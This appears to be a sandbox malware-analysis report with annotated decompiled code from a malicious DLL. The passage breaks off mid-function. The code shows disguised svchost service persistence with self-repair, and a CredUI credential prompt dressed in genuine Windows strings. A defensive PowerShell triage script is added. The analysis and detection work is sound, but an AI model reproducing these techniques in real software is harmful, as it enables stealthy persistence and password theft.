    									L28:
    									_t203 = 0;
    									__eflags = 0;
    									L29:
    									_push(_t203);
    									_push(_t234);
    									_t204 = E6ECA44D0(_t209, _t262);
    									_t291 = _t283 + 8;
    									__eflags = _t204;
    									if(_t204 == 0) {
    										goto L106;
    									}
    									_t279 = 5;
    									do {
    										Sleep(0x3e8);
    										_t279 = _t279 - 1;
    										__eflags = _t279;
    									} while (_t279 != 0);
    									E6ECA5060(5, 1, _t279);
    									_t283 = _t291 + 0xc;
    									goto L130;
    								}
    								_t206 =  *((intOrPtr*)(_t280 + 8));
    								__eflags =  *_t206 - 0x66;
    								if( *_t206 != 0x66) {
    									goto L28;
    								}
    								__eflags =  *((char*)(_t206 + 1));
    								if( *((char*)(_t206 + 1)) != 0) {
    									goto L28;
    								}
    								_t203 = 1;
    								goto L29;
    							}
    							__eflags =  *((char*)(_t202 + 1));
    							if( *((char*)(_t202 + 1)) != 0) {
    								goto L21;
    							}
    							_t234 = 1;
    							goto L24;
    						} else {
    							E6ECA5AF0(_t209, 2, 0, 0);
    							_t283 = _t283 + 0x10;
    							goto L130;
    						}
    					}
    					if(_t271 == 0x76a0ce1) {
    						E6ECA52B0(_t280, 0);
    						_t283 = _t283 + 4;
    						goto L130;
    					}
    					if(_t271 == 0x190cb7c3) {
    						goto L37;
    					}
    					if(_t271 != 0x2965d6c5) {
    						goto L115;
    					}
    					goto L13;
    				}
    			}


    APIs
      • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
      • Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4
    • CharLowerA.USER32 ref: 6ECA5B93
    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6ECA5BB5
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA5BBC
    • lstrlenA.KERNEL32 ref: 6ECA5BD2
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6ECA5BE1
    • Sleep.KERNEL32(000003E8), ref: 6ECA5CE5
      • Part of subcall function 6ECA5AF0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6ECA5B03
      • Part of subcall function 6ECA5AF0: PostThreadMessageA.USER32(00000000,000083FE,00000000,?), ref: 6ECA5B2E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6401
    • HeapFree.KERNEL32(00000000), ref: 6ECA6408
    • LocalFree.KERNEL32(00000000), ref: 6ECA6420
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6ECA643B
    • CloseHandle.KERNEL32 ref: 6ECA6444
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6450
    • HeapFree.KERNEL32(00000000), ref: 6ECA6453
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA645F
    • HeapFree.KERNEL32(00000000), ref: 6ECA6462
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6467
    • HeapFree.KERNEL32(00000000), ref: 6ECA646A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeProcess$AllocLocallstrlen$CharCloseComputeCrc32CreateEventHandleLowerMessageObjectPostSingleSleepThreadWait
    • String ID: "%s%s" /c %s$%lu$%s%c%lu%s$%s%s$%s%s%s$.cab$.pdll$/c %s$cmd.exe$gd$open
    • API String ID: 2480811851-2674861874
    • Opcode ID: d35f200d620b980a017a02c93c1243927389470f1586e1b03c98fcebbd1ffff1
    • Instruction ID: 13ed21a76b6273e35215381ee1f0358bc49077d4248d7868d88d8459523ea0fe
    • Opcode Fuzzy Hash: d35f200d620b980a017a02c93c1243927389470f1586e1b03c98fcebbd1ffff1
    • Instruction Fuzzy Hash: 0B322AB1A54703BBE7109BEC8D45FAB7679EB45708F008818FB165B2C5F6B0DC458BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6ECA3C60() {
    				char _v760;
    				char _v772;
    				char _v780;
    				char _v1016;
    				char _v1024;
    				char _v1032;
    				char _v1036;
    				char _v1040;
    				char _v1044;
    				char _v1048;
    				intOrPtr _v1052;
    				int _v1056;
    				intOrPtr _v1060;
    				int _v1064;
    				intOrPtr _v1068;
    				int _v1072;
    				int* _v1076;
    				char _v1080;
    				char* _v1084;
    				char* _v1088;
    				void* _v1092;
    				void* _v1096;
    				char _v1100;
    				void* _v1104;
    				void* _v1108;
    				void* _v1112;
    				int _v1116;
    				void* _v1120;
    				char* _v1124;
    				void* _v1128;
    				intOrPtr _v1132;
    				char _v1140;
    				void* _t80;
    				void** _t85;
    				char* _t99;
    				int _t100;
    				intOrPtr _t104;
    				intOrPtr _t108;
    				char* _t125;
    				void* _t145;
    				long _t151;
    				char* _t173;
    				CHAR* _t174;
    				long _t182;
    				char** _t196;
    				char** _t199;
    				char** _t200;
    				char** _t201;
    				char** _t202;
    				char** _t203;
    				intOrPtr _t207;
    				intOrPtr _t220;
    
    				_t196 =  &_v1124;
    				_v1112 = 0;
    				// 0xf003f = SC_MANAGER_ALL_ACCESS. The else branch at the end falls back to SC_MANAGER_CONNECT (1),
    				// so the repair path below still runs when the caller is not an administrator.
    				_t80 = OpenSCManagerA(0, 0, 0xf003f);
    				_v1108 = _t80;
    				if(_t80 != 0) {
    					L2:
    					_v1124 = 0;
    					// 0xf01ff = SERVICE_ALL_ACCESS. If "USBManager" already exists, jump straight to the repair path at L14.
    					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
    					if(_t145 != 0) {
    						L14:
    						_v1112 = 1;
    						// Repair path: open HKLM\SYSTEM\CurrentControlSet\Services\USBManager\Parameters
    						// (0x80000002 = HKEY_LOCAL_MACHINE, 0xf023f = KEY_ALL_ACCESS | KEY_WOW64_32KEY).
    						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
    						if(RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0) == 0) {
    							// L6ECAC2EE is RtlZeroMemory (API list: RtlZeroMemory(?, 0x105) at 6ECA4032).
    							_push(0x105);
    							_push( &_v1036);
    							L6ECAC2EE();
    							_v1120 = 0x105;
    							_v1116 = 2;
    							// Read the current ServiceDLL value (2 = REG_EXPAND_SZ); if it is missing or differs from the
    							// path the sample expects (M6ECB0524), it is rewritten at L17. This is self-repair of the persistence.
    							if(RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120) != 0) {
    								L17:
    								_t151 = M6ECB052C; // 0x21 = length of the DLL path; 0x22 bytes are written, NUL included
    								_t173 = M6ECB0524; // 0xcd1c70 = pointer to the DLL path string
    								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
    							} else {
    								_t174 = M6ECB0524; // 0xcd1c70
    								if(lstrcmpiA( &_v1044, _t174) != 0) {
    									goto L17;
    								}
    							}
    							RegCloseKey(_v1124);
    						}
    						// Zero a 0x24-byte SERVICE_STATUS_PROCESS and query it (0 = SC_STATUS_PROCESS_INFO).
    						L6ECAC2EE();
    						_t85 =  &_v1104;
    						_v1104 = 0;
    						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
    						// dwCurrentState != 4 (SERVICE_RUNNING): pass the service handle and an argv of {"s"} to
    						// E6ECA37D0, whose body is not shown here; its arguments are those of a StartService wrapper.
    						if(_t85 == 0 || _v1096 != 4) {
    							_t220 = M6ECB0544; // 0x1
    							if(_t220 == 0) {
    								_push(0);
    								_push(0);
    							} else {
    								_push(1);
    								_v1140 = "s";
    								_push( &_v1140);
    							}
    							_push(_t145);
    							E6ECA37D0();
    						}
    						CloseServiceHandle(_t145);
    					} else {
    						// Install path, taken only when the global flag M6ECB0544 is set.
    						_t207 = M6ECB0544; // 0x1
    						if(_t207 != 0) {
    							_t99 = M6ECB053C; // 0xcb2cac = string passed as the -svcr argument
    							// Host the DLL in its own svchost group: svchost.exe -k "USBPortsManagerGrp" -svcr "<M6ECB053C>"
    							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
    							_t199 =  &(_t196[5]);
    							_v1112 = _t100;
    							// 0xf01ff = SERVICE_ALL_ACCESS, 0x20 = SERVICE_WIN32_SHARE_PROCESS, 2 = SERVICE_AUTO_START,
    							// 0 = SERVICE_ERROR_IGNORE. The decompiler names the SCM handle _v1100 here: its stack-slot
    							// names drift after every wsprintfA because of the _t196/_t199/... stack adjustments.
    							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
    							if(_t145 != 0) {
    								// SERVICE_FAILURE_ACTIONS, level 2 = SERVICE_CONFIG_FAILURE_ACTIONS: dwResetPeriod = 0,
    								// no reboot message or command, cActions = 3, each {SC_ACTION_RESTART (1), 5000 ms (0x1388)}.
    								// The SCM restarts the service whenever its svchost host dies or is killed.
    								_v1072 = 1;
    								_v1064 = 1;
    								_v1056 = 1;
    								_v1068 = 0x1388;
    								_v1060 = 0x1388;
    								_v1052 = 0x1388;
    								_v1092 = 0;
    								_v1084 = 0;
    								_v1088 = 0;
    								_v1080 = 3;
    								_v1076 =  &_v1072;
    								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
    								// Register the new svchost group. The key prefix *0x6ecb047c is a NULL pointer in this dump,
    								// so the full key path is not visible; the format ("%c" = 0 cuts the string after "svchost")
    								// and the REG_MULTI_SZ (7) value "USBPortsManagerGrp" = "USBManager" are the layout used under
    								// SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost.
    								_t104 =  *0x6ecb047c; // 0x0
    								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6ecad543);
    								_t200 =  &(_t199[6]);
    								if(RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0) == 0) {
    									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager"));
    									RegCloseKey(_v1120);
    								}
    								// <prefix>\svchost\USBPortsManagerGrp (0x5c = '\\'): the per-group COM settings a genuine svchost
    								// group also carries, AuthenticationCapabilities = 0x2000 and CoInitializeSecurityParam = 1, both
    								// REG_DWORD (4). E6ECA2170(key, 4) here and E6ECA2170(service, 2) below are not shown; their second
    								// argument matches SE_REGISTRY_KEY (4) and SE_SERVICE (2) of SE_OBJECT_TYPE.
    								_t108 =  *0x6ecb047c; // 0x0
    								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
    								_t201 =  &(_t200[6]);
    								if(RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0) == 0) {
    									E6ECA2170(_v1112, 4);
    									_t201 =  &(_t201[2]);
    									_v1100 = 0x2000;
    									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4);
    									_v1104 = 1;
    									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4);
    									RegCloseKey(_v1112);
    								}
    								// Services\USBManager\Parameters: ServiceDLL (2 = REG_EXPAND_SZ) = the DLL path, ImagePath,
    								// ServiceMain (1 = REG_SZ) = "SvcEntry" (the DLL's service entry export) and
    								// ServiceDllUnloadOnStop = 0, so the DLL stays mapped in svchost after the service is stopped.
    								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
    								_t202 =  &(_t201[5]);
    								if(RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0) == 0) {
    									E6ECA2170(_v1104, 4);
    									_t182 = M6ECB052C; // 0x21
    									_t125 = M6ECB0524; // 0xcd1c70
    									_t202 =  &(_t202[2]);
    									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1);
    									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1);
    									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
    									_v1096 = 0;
    									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4);
    									RegCloseKey(_v1104);
    								}
    								// Services\USBManager itself also gets ServiceMain = "SvcEntry" (0x6ecad543 is the trailing suffix).
    								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6ecad543);
    								_t203 =  &(_t202[5]);
    								if(RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0) == 0) {
    									E6ECA2170(_v1096, 4);
    									_t203 =  &(_t203[2]);
    									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
    									RegCloseKey(_v1096);
    								}
    								E6ECA2170(_t145, 2);
    								_t196 =  &(_t203[2]);
    								// Fall into the repair path, which verifies ServiceDLL and starts the service if it is not running.
    								goto L14;
    							}
    						}
    					}
    					CloseServiceHandle(_v1128);
    					return _v1132;
    				} else {
    					_t80 = OpenSCManagerA(0, 0, 1);
    					_v1108 = _t80;
    					if(_t80 == 0) {
    						return 0;
    					} else {
    						goto L2;
    					}
    				}
    			}

    (Instruction-address column from the original page, collapsed: 0x6eca3c60 .. 0x6eca4129, one address per line of E6ECA3C60 above.)


    APIs
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3C7E
    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3C8C
    • OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6ECA3CAA
    • wsprintfA.USER32 ref: 6ECA3CEF
    • CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3D1E
    • ChangeServiceConfig2A.ADVAPI32 ref: 6ECA3D74
    • wsprintfA.USER32 ref: 6ECA3D95
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6ECA3DB3
    • lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6ECA3DC2
    • RegSetValueExA.ADVAPI32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6ECA3DDB
    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6ECA3DE2
    • wsprintfA.USER32 ref: 6ECA3E04
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3E22
    • RegSetValueExA.ADVAPI32 ref: 6ECA3E57
    • RegSetValueExA.ADVAPI32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6ECA3E75
    • RegCloseKey.ADVAPI32(00000000), ref: 6ECA3E7C
    • wsprintfA.USER32 ref: 6ECA3E9B
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3EB9
    • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00CD1C70,00000022), ref: 6ECA3EF1
    • RegSetValueExA.ADVAPI32(?,ImagePath,00000000,00000002,?,?), ref: 6ECA3F0E
    • lstrlenA.KERNEL32(SvcEntry), ref: 6ECA3F15
    • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6ECA3F2E
    • RegSetValueExA.ADVAPI32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6ECA3F48
    • RegCloseKey.ADVAPI32(?), ref: 6ECA3F4F
    • wsprintfA.USER32 ref: 6ECA3F6E
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3F8C
    • lstrlenA.KERNEL32(SvcEntry), ref: 6ECA3FAA
    • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6ECA3FC3
    • RegCloseKey.ADVAPI32(?), ref: 6ECA3FCA
    • wsprintfA.USER32 ref: 6ECA3FFC
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6ECA401A
    • RtlZeroMemory.NTDLL(?,00000105), ref: 6ECA4032
    • RegQueryValueExA.ADVAPI32 ref: 6ECA4061
    • lstrcmpiA.KERNEL32(?,00CD1C70), ref: 6ECA4077
    • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00CD1C70,00000022), ref: 6ECA409D
    • RegCloseKey.ADVAPI32(?), ref: 6ECA40A4
    • RtlZeroMemory.NTDLL(?,00000024), ref: 6ECA40B1
    • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6ECA40C8
    • CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA40FE
    • CloseServiceHandle.ADVAPI32(?), ref: 6ECA4109
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
    • String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
    • API String ID: 567274075-2313540708
    • Opcode ID: 0d83f73535ebfdb113c9a458e0e990d7cb8b3f72ab87f4c9832c686258f54a62
    • Instruction ID: 269412544f9cc6b6ddcd19e06a7ca573297fd4fceb7c35bc0e6288cca0571f09
    • Opcode Fuzzy Hash: 0d83f73535ebfdb113c9a458e0e990d7cb8b3f72ab87f4c9832c686258f54a62
    • Instruction Fuzzy Hash: 1AD138B1104306BBD304DFA9CD89E6FBBBCEB89748F004D0DBB5997244E671A9048F66
    Uniqueness

    Uniqueness Score: -1.00%
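E6ECA3C60 leaves a fixed set of host artifacts: a service named USBManager whose ImagePath is svchost.exe -k "USBPortsManagerGrp", a REG_MULTI_SZ svchost-group value USBPortsManagerGrp that lists USBManager, and a Parameters\ServiceDLL pointing at the DLL with ServiceMain = SvcEntry. The PowerShell triage script below is an added example; it is not part of this sandbox report or of the sample's code. It checks a host for exactly those artifacts and then generalises the check to every svchost-hosted service whose ServiceDll lives outside %SystemRoot%\System32 or does not carry a valid Authenticode signature. It assumes the svchost group list lives under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (the key prefix the sample formats into its path is a NULL pointer in the dump, so the exact path it used is not visible) and that it runs from an elevated shell.

```powershell
# Added example (not from the sandbox report or the sample): triage a host for the
# service persistence written by E6ECA3C60, then generalise to any svchost-hosted
# service whose ServiceDll is suspicious.
# Assumptions: run as Administrator; the svchost group list is under
# HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (the sample's own key
# prefix is a NULL pointer in the dump, so its exact path is not visible).

$ServiceName  = 'USBManager'          # service name from the decompiled code
$GroupName    = 'USBPortsManagerGrp'  # svchost group from the -k argument
$SvchostRoot  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Test-UsbManagerArtifacts {
    $findings = @()

    # 1. The service key (CreateServiceA "USBManager", display name "USB Ports Manager").
    $svcKey = Join-Path $ServicesRoot $ServiceName
    if (Test-Path $svcKey) {
        $svc = Get-ItemProperty -Path $svcKey
        $findings += [pscustomobject]@{
            Artifact = 'Service key'; Path = $svcKey
            Detail   = "ImagePath=$($svc.ImagePath) ServiceMain=$($svc.ServiceMain)"
        }
    }

    # 2. Parameters\ServiceDll, ServiceMain=SvcEntry, ServiceDllUnloadOnStop=0.
    $paramKey = Join-Path $svcKey 'Parameters'
    if (Test-Path $paramKey) {
        $p = Get-ItemProperty -Path $paramKey
        $findings += [pscustomobject]@{
            Artifact = 'Parameters'; Path = $paramKey
            Detail   = "ServiceDll=$($p.ServiceDll) ServiceMain=$($p.ServiceMain) UnloadOnStop=$($p.ServiceDllUnloadOnStop)"
        }
    }

    # 3. The svchost group registration: REG_MULTI_SZ "USBPortsManagerGrp" = "USBManager".
    $groupValue = (Get-ItemProperty -Path $SvchostRoot -ErrorAction SilentlyContinue).$GroupName
    if ($groupValue) {
        $findings += [pscustomobject]@{
            Artifact = 'Svchost group'; Path = "$SvchostRoot\$GroupName"
            Detail   = "Members=$($groupValue -join ',')"
        }
    }
    return $findings
}

function Get-SuspiciousSvchostServiceDlls {
    # Generic form of the same check: every service hosted by svchost.exe whose
    # ServiceDll is outside %SystemRoot%\System32 or fails Authenticode validation.
    $system32 = Join-Path $env:SystemRoot 'System32'
    Get-ChildItem -Path $ServicesRoot | ForEach-Object {
        $svc = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $svc.ImagePath -or $svc.ImagePath -notmatch 'svchost\.exe') { return }

        $paramPath = Join-Path $_.PSPath 'Parameters'
        $dll = $null
        if (Test-Path $paramPath) { $dll = (Get-ItemProperty -Path $paramPath).ServiceDll }
        if (-not $dll) { return }

        $expanded = [Environment]::ExpandEnvironmentVariables($dll)
        $outsideSystem32 = -not $expanded.StartsWith($system32, [StringComparison]::OrdinalIgnoreCase)
        $sig = if (Test-Path $expanded) { (Get-AuthenticodeSignature -FilePath $expanded).Status } else { 'FileMissing' }

        if ($outsideSystem32 -or $sig -ne 'Valid') {
            [pscustomobject]@{
                Service    = $_.PSChildName
                ImagePath  = $svc.ImagePath
                ServiceDll = $expanded
                Signature  = $sig
                Reason     = if ($outsideSystem32) { 'ServiceDll outside System32' } else { "Signature $sig" }
            }
        }
    }
}

Test-UsbManagerArtifacts          | Format-Table -AutoSize
Get-SuspiciousSvchostServiceDlls  | Format-Table -AutoSize
```

Any row from Test-UsbManagerArtifacts is a direct match for this sample's persistence. Rows from Get-SuspiciousSvchostServiceDlls need review: a DLL can be validly signed and still be malicious, so a Valid signature status should lower, not clear, suspicion when the DLL location, the service name or the group name is unexpected.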

    C-Code - Quality: 47%
    			E6ECA96D0(intOrPtr _a4) {
    				intOrPtr _v4;
    				signed int _v72;
    				char _v1028;
    				short _v1036;
    				char _v1048;
    				void* _v1296;
    				char _v1300;
    				void* _v1304;
    				intOrPtr _v1308;
    				void* _v1312;
    				void* _v1316;
    				void* _v1320;
    				intOrPtr _v1324;
    				void* _v1328;
    				void* _v1332;
    				void* _v1336;
    				intOrPtr _v1340;
    				void* _v1344;
    				void* _v1348;
    				void* _v1352;
    				char _v1356;
    				WCHAR* _v1368;
    				short* _v1372;
    				char _v1376;
    				void* _v1380;
    				intOrPtr _v1384;
    				void* _v1392;
    				intOrPtr _v1396;
    				struct HINSTANCE__* _v1400;
    				void* _v1404;
    				char _v1412;
    				char _v1416;
    				void* _v1420;
    				long _v1424;
    				long _v1432;
    				long _v1436;
    				long _v1448;
    				intOrPtr _v1452;
    				long _v1456;
    				intOrPtr _v1472;
    				char _v1480;
    				char _v1496;
    				intOrPtr _v1500;
    				intOrPtr _v1508;
    				intOrPtr _v1524;
    				void* _v1532;
    				intOrPtr _v1544;
    				void* _v1556;
    				void* _t93;
    				void* _t94;
    				void* _t99;
    				CHAR* _t106;
    				void* _t110;
    				void* _t133;
    				int _t140;
    				signed int _t145;
    				struct HDESK__* _t149;
    				void* _t152;
    				struct HINSTANCE__* _t154;
    				void* _t155;
    				WCHAR* _t156;
    				WCHAR* _t157;
    				struct HDESK__* _t158;
    				struct HDESK__* _t171;
    				WCHAR* _t174;
    				WCHAR* _t180;
    				struct HDESK__* _t183;
    				WCHAR* _t185;
    				struct HINSTANCE__* _t188;
    				short* _t190;
    				void* _t191;
    				signed int _t195;
    				signed int _t196;
    				WCHAR* _t199;
    				long _t200;
    				short* _t202;
    				void* _t204;
    				void* _t205;
    				void* _t206;
    
    				// E6ECA5130 wraps LogonUserW (see the API list): user M6ECB04F8, domain M6ECB0504, and the buffer at
    				// 0x6ecad664 as password. A successful logon means the stored credentials are already valid, so
    				// no prompt is shown.
    				_t93 = M6ECB0504; // 0xcd3fb0
    				_t157 = M6ECB04F8; // 0xcd21b8
    				_t94 = E6ECA5130(_t157, _t93, 0x6ecad664);
    				_t204 =  &_v1416 + 0xc;
    				if(_t94 != 0) {
    					L39:
    					return 0;
    				} else {
    					_t152 = 0;
    					// With _a4 set, switch to the desktop held in *0x6ecb0480 (0 in this dump) before prompting; the
    					// exit path at L37 sleeps 2 s (0x7d0) and switches back to *0x6ecb0484.
    					if(_a4 != 0) {
    						_t183 =  *0x6ecb0480; // 0x0
    						SwitchDesktop(_t183);
    						_t149 =  *0x6ecb0480; // 0x0
    						SetThreadDesktop(_t149);
    					}
    					_t188 = LoadLibraryA("credui.dll");
    					_v1380 = _t188;
    					if(_t188 == _t152) {
    						L37:
    						if(_a4 != _t152) {
    							Sleep(0x7d0);
    							_t158 =  *0x6ecb0484; // 0x0
    							SwitchDesktop(_t158);
    							_t171 =  *0x6ecb0484; // 0x0
    							SetThreadDesktop(_t171);
    						}
    						goto L39;
    					}
    					// Resolve four credui.dll exports by 32-bit hash (0x24bec39d, 0xb4bb2c26, 0x4b177521, 0xc07eb83e)
    					// through E6ECA1DB0(module, table, 4, 0xff000000) instead of importing them by name, so no CredUI*
    					// name appears in the import table. The resolved pointers are the indirect calls further down
    					// (_v1296, _v1316, _v1384, _v1420, _v1456); the slot names drift with the stack adjustments.
    					_push(0xff000000);
    					_push(4);
    					_push( &_v1356);
    					_push(_t188);
    					_v1356 = 0x24bec39d;
    					_v1352 = _t152;
    					_v1348 = _t152;
    					_v1344 = _t152;
    					_v1340 = 0xb4bb2c26;
    					_v1336 = _t152;
    					_v1332 = _t152;
    					_v1328 = _t152;
    					_v1324 = 0x4b177521;
    					_v1320 = _t152;
    					_v1316 = _t152;
    					_v1312 = _t152;
    					_v1308 = 0xc07eb83e;
    					_v1304 = _t152;
    					_v1300 = _t152;
    					_v1296 = _t152;
    					_t99 = E6ECA1DB0();
    					_t205 = _t204 + 0x10;
    					if(_t99 == 0) {
    						L36:
    						FreeLibrary(_t188);
    						goto L37;
    					}
    					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
    					if(_t185 == _t152) {
    						L35:
    						goto L36;
    					}
    					// CREDUI_INFOW: cbSize = 0x14 (20 bytes on 32-bit), no parent window; caption and message are
    					// filled in below. 0x202 and 0x101 characters are CREDUI_MAX_USERNAME_LENGTH + 1 and
    					// CREDUI_MAX_PASSWORD_LENGTH + 1, the sizes of the user and password buffers carved out of the
    					// 0x2000-byte heap block _t185.
    					_push(0x14);
    					_push( &_v1376);
    					L6ECAC2EE();
    					_v1384 = 0x14;
    					_v1380 = _t152;
    					_v1412 = 0x202;
    					_v1396 = 0x101;
    					_t26 =  &(_t185[0x657]); // 0xcae
    					_t190 = _t26;
    					_t27 =  &(_t185[0x6d8]); // 0xdb0
    					_t199 = _t27;
    					// Decoy text: load %SystemRoot%\system32\rstrui.exe (System Restore) or wuaueng.dll (Windows Update
    					// agent) as an image resource (0x20 = LOAD_LIBRARY_AS_IMAGE_RESOURCE) and pull string-table entries
    					// from it below, so the credential dialog carries the caption and message of a genuine Windows component.
    					GetSystemDirectoryA( &_v1300, 0x104);
    					PathAddBackslashA( &_v1300);
    					_t106 = "rstrui.exe";
    					if(_v4 != _t152) {
    						_t106 = "wuaueng.dll";
    					}
    					lstrcatA( &_v1300, _t106);
    					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
    					if(_t154 == 0) {
    						L20:
    						_t174 = M6ECB04F8; // 0xcd21b8
    						_t110 = M6ECB0504; // 0xcd3fb0
    						_t200 = 0;
    						_t191 = 0;
    						_v1392 = 0;
    						_v1424 = 0;
    						_v1416 = 0;
    						_v1404 = 0;
    						_v1420 = 0;
    						// L"%s\\%s" = domain\user. First resolved call, made with a NULL output buffer: it must fail with
    						// ERROR_INSUFFICIENT_BUFFER (0x7a) and return the required size, the two-call pattern of
    						// CredPackAuthenticationBufferW(0, user, password, NULL, &size).
    						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
    						_t206 = _t205 + 0x10;
    						_push( &_v1412);
    						_push(0);
    						_push(0x6ecad664);
    						_push( &_v1028);
    						_push(0);
    						if(_v1296() != 0 || GetLastError() != 0x7a) {
    							L34:
    							HeapFree(GetProcessHeap(), _t200, _t185);
    							_t188 = _v1400;
    							_t152 = 0;
